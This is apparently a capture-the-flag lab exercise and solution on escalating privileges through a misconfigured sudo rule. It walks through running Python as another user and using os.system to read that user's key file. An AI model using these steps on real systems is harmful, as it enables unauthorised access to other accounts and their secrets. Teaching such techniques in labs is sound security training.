In this challenge, we are going to work on more privileges escalation based on misconfigurations of the sudo command. 
As before, you can use sudo -l to see what command you're authorized to run.

To solve this challenge, you will need to use the python command that will start a REPL (A Read–Eval–Print Loop). From that you should be able to:

    import the call command from the subprocess module:

    from subprocess import call

    run commands:

    call(['uname'])

You can also manage to get the same result using the os module and os.system('uname').

Using this information, you should be able to run command as the victim user and gain access to the key.



sudo -l

sudo -u victim python
call(['uname'])
OR 
import os > os.system('uname')

os.system('cat /home/victim/key.txt')
